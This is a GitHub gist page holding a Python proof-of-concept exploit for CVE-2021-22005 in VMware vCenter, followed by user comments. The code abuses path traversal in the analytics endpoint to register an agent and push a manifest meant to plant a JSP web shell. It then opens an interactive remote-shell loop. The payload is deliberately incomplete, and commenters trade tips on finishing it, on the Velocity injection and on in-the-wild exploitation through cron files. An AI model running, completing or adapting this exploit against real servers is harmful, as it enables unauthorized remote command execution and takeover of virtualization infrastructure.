-
-
Save testanull/c2f6fd061c496ea90ddee151d6738d2e to your computer and use it in GitHub Desktop.
CVE-2021-22005_PoC.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import random | |
import string | |
import sys | |
import time | |
import requests | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
def id_generator(size=6, chars=string.ascii_lowercase + string.digits): | |
return ''.join(random.choice(chars) for _ in range(size)) | |
def escape(_str): | |
_str = _str.replace("&", "&") | |
_str = _str.replace("<", "<") | |
_str = _str.replace(">", ">") | |
_str = _str.replace("\"", """) | |
return _str | |
def run_shell(url, pwd, cmd): | |
burp0_url = url | |
burp0_headers = {"User-Agent": "Mozilla/5.0", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"} | |
burp0_data = {pwd: cmd.strip()} | |
ct = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False).content | |
ct = ct.split('<pre>')[1].split('</pre>')[0] | |
return ct | |
def createAgent(url, agent_name): | |
burp0_url = url + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c="+agent_name+"&_i=test2" | |
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"} | |
burp0_json={"manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded": True,"deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7","localPayloadPath": "a8","localObfuscationMapPath": "a9" } | |
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False) | |
pwd = id_generator(6) | |
agent_name = id_generator(6) | |
shell_name = id_generator(6)+".jsp" | |
manifestData = """<manifest recommendedPageSize="500"> | |
<request> | |
<query name="vir:VCenter"> | |
<constraint> | |
<targetType>ServiceInstance</targetType> | |
</constraint> | |
<propertySpec> | |
<propertyNames>content.about.instanceUuid</propertyNames> | |
<propertyNames>content.about.osType</propertyNames> | |
<propertyNames>content.about.build</propertyNames> | |
<propertyNames>content.about.version</propertyNames> | |
</propertySpec> | |
</query> | |
</request> | |
<cdfMapping> | |
<indepedentResultsMapping> | |
<resultSetMappings> | |
<entry> | |
<key>vir:VCenter</key> | |
<value> | |
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping"> | |
<resourceItemToJsonLdMapping> | |
<forType>ServiceInstance</forType> | |
<mappingCode><![CDATA[ | |
#set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())## | |
#set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")## | |
#set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))## | |
$obj.addProperty("OSTYPE", "VMware can't steal this PoC")## | |
$obj.addProperty("BUILD", $content-about-build)## | |
$obj.addProperty("VERSION", $content-about-version)##]]> | |
</mappingCode> | |
</resourceItemToJsonLdMapping> | |
</value> | |
</value> | |
</entry> | |
</resultSetMappings> | |
</indepedentResultsMapping> | |
</cdfMapping> | |
<requestSchedules> | |
<schedule interval="1h"> | |
<queries> | |
<query>vir:VCenter</query> | |
</queries> | |
</schedule> | |
</requestSchedules> | |
</manifest>""" % (shell_name, pwd, pwd) | |
target = sys.argv[1] | |
print "Target: "+ target | |
print "Creating Agent (of SHIELD) ..." | |
createAgent(target, agent_name) | |
print "Collecting Agent (of SHIELD) ..." | |
burp0_url = target+"/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2" | |
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"} | |
burp0_json={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"} | |
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, proxies={"https":"http://127.0.0.1:8080"}) | |
print "Success!" | |
print "Shell: " + target+"/idm/..;/"+shell_name | |
print "Pwd: "+ pwd | |
print "Launching pseudo shell ..." | |
while True: | |
cmd = raw_input("/remote_shell/# ").strip() | |
if(cmd =="quit"): | |
sys.exit(-1) | |
output = run_shell(target+"/idm/..;/"+shell_name,pwd, cmd) | |
time.sleep(1) | |
print(output) |
thanks it worked out but now this:
(cve20212022) PS C:\temp\cve20212022> python .\CVE20212022.py
Traceback (most recent call last):
File "C:\temp\cve20212022\CVE20212022.py", line 36, in
manifestData = """
TypeError: not all arguments converted during string formatting
any ideas ? your video poc is pretty smooth
to anyone wondering you just need to modify mappingCode to execute velocity payload, this is unfinished poc so suit yourself
did anyone manage to abuse GLOBAL-Logger (Log4J) to bypass Velocity?
It looks like this is being exploited in the wild a simpler way by writing a json file to /etc/cron.d/ without doing the velocity template injection https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005 Are you going to publish a full poc?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
u can fix it easly by editing print line from
print ""
To
print("")